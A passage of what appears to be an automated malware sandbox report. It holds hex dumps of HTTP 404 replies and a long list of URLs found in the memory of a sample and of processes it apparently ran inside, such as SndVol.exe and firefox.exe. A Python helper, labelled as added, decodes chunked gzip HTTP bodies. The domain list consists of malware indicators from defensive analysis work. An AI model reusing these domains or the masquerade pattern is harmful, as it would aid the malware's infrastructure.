65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:50:53 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:50:58 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:18 GMTServer: Apache/2.4.10 (Debian)Content-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 6e 74 65 6e 74 69 6f 6e 2e 64 69 67 69 74 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.intention.digital Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:51:24 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
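The replies above are printed by the sandbox with the status line and headers run together and the body as a truncated hex dump. The LiteSpeed 404s are chunked and gzip-compressed, so their raw bytes (`31 33 35 41 0d 0a 1f 8b 08 ...`) are a chunk-size line `135A` (4954 bytes) followed by a gzip header rather than readable HTML; the nginx replies carry only the terminating `0\r\n\r\n` chunk, and the Apache reply has a plain 283-byte body. The Python below is an added helper, not part of the Joe Sandbox report or of the sample, for recovering a body from such a line: it re-splits the flattened header text on a lookahead for known header names (an assumption; a header name missing from the list stays glued to the previous value), strips chunked framing, and inflates gzip tolerantly so a dump cut off mid-stream still yields the decodable prefix and is flagged as incomplete. The chunked gzip sample it decodes is constructed inline; the nginx line and the first bytes of the LiteSpeed reply are taken from the report.

```python
from __future__ import annotations

import gzip
import re
import zlib

# Header names the report is seen to print; used to re-split the flattened header text.
# Assumption: a capture with another header needs it added here, or it stays attached to
# the value before it.
KNOWN_HEADERS = (
    "keep-alive", "content-type", "content-length", "transfer-encoding",
    "content-encoding", "vary", "date", "server", "x-turbo-charged-by", "connection",
)
_HEADER_SPLIT = re.compile(
    r"(?=(?:" + "|".join(re.escape(h) for h in KNOWN_HEADERS) + r"):)", re.IGNORECASE
)


def parse_flattened_headers(text: str) -> tuple[str, dict[str, str]]:
    """Split 'HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: ...'
    (status line and headers printed back to back, CRLFs removed) into the status line
    and a lower-cased header dict. Heuristic: cuts wherever a known name followed by ':'
    begins."""
    parts = [p for p in _HEADER_SPLIT.split(text) if p]
    status = parts[0].strip()
    headers: dict[str, str] = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def hex_dump_to_bytes(data_raw: str) -> bytes:
    """Turn the space-separated hex of a 'Data Raw:' field into bytes. The report cuts
    long dumps off mid-byte (a trailing '4b d'); a dangling nibble is dropped."""
    return bytes.fromhex("".join(t for t in data_raw.split() if len(t) == 2))


def dechunk(body: bytes) -> tuple[bytes, bool]:
    """Remove HTTP/1.1 chunked framing. Returns (payload, complete); complete is False
    when the dump ends before the terminating zero-size chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False          # the size line itself is cut off
        size_field = body[pos:eol].split(b";")[0].strip()
        try:
            size = int(size_field, 16)
        except ValueError:
            return bytes(out), False
        pos = eol + 2
        if size == 0:
            return bytes(out), True           # "0\r\n\r\n": last chunk seen
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False          # chunk declared larger than what was captured
        pos += size + 2                       # skip the CRLF that ends the chunk


def gunzip_tolerant(data: bytes) -> tuple[bytes, bool]:
    """Inflate a gzip stream, keeping whatever decompresses from a cut-off stream.
    Returns (plaintext, stream_complete)."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    try:
        out = d.decompress(data)
    except zlib.error:
        return b"", False
    return out, d.eof


def decode_body(data_raw: str, headers: dict[str, str]) -> tuple[bytes, bool]:
    """Undo the framing the headers announce (chunked, then gzip) on a 'Data Raw' hex dump."""
    body = hex_dump_to_bytes(data_raw)
    complete = True
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body, complete = dechunk(body)
    if headers.get("content-encoding", "").lower() == "gzip":
        body, eof = gunzip_tolerant(body)
        complete = complete and eof
    return body, complete


def parse_report_line(line: str) -> dict:
    """Decode one 'HTTP traffic detected: ...Data Raw: ...Data Ascii: ...' report line."""
    head, _, rest = line.partition("Data Raw:")
    head = head.split("HTTP traffic detected:", 1)[-1].strip()
    hex_part = rest.split("Data Ascii:", 1)[0]
    status, headers = parse_flattened_headers(head)
    body, complete = decode_body(hex_part, headers)
    return {"status": status, "headers": headers, "body": body, "complete": complete}


def make_sample_dump(html: bytes, truncate_at: int | None = None) -> str:
    """Constructed test data: frame `html` as a single gzip chunk the way the LiteSpeed
    404s on the page are framed, optionally cut off after `truncate_at` bytes as the
    report does."""
    gz = gzip.compress(html, mtime=0)
    framed = b"%X\r\n%s\r\n0\r\n\r\n" % (len(gz), gz)
    if truncate_at is not None:
        framed = framed[:truncate_at]
    return " ".join(f"{b:02x}" for b in framed)


if __name__ == "__main__":
    # The nginx reply from the report: an empty chunked body ("0\r\n\r\n").
    nginx = ("Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0"
             "Date: Thu, 06 Feb 2025 07:50:53 GMTTransfer-Encoding: chunkedConnection: close"
             "Data Raw: 30 0d 0a 0d 0a Data Ascii: 0")
    print(parse_report_line(nginx))
    # A constructed chunked gzip body, decoded whole and after truncation.
    page = b"<html><body><h1>404 Not Found</h1></body></html>"
    hdrs = {"transfer-encoding": "chunked", "content-encoding": "gzip"}
    print(decode_body(make_sample_dump(page), hdrs))
    print(decode_body(make_sample_dump(page, truncate_at=30), hdrs))
```

Run against the LiteSpeed lines from the report, the decoder returns only the prefix of the error page that the captured bytes inflate to and `complete=False`, since the dump stops well inside the 0x135A-byte chunk; against the nginx lines it returns an empty, complete body. The Apache reply is neither chunked nor compressed, so its `Data Ascii` is already the whole body.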
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000006A68000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fdkflsddfdflkfmvdfvdf-dfksmdfllksm.com/
                Source: file.exe, 00000000.00000002.1328355914.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.5lzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.9xiuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aguardiente.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.americanstar.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.automester.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.autp.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babygirlnames.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beautifullady.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=248421974679
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beibizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitza.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bolezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.caobizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerservice.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chuyuzhibo.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.companybuilder.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dajingzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duniangzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dynaform.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eduexpo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ellanse.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eroticstore.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eventmagic.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstdial.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstmusic.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesisenergy.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globalreview.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gstec.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hackpack.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haicaozhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hedco.net/binding
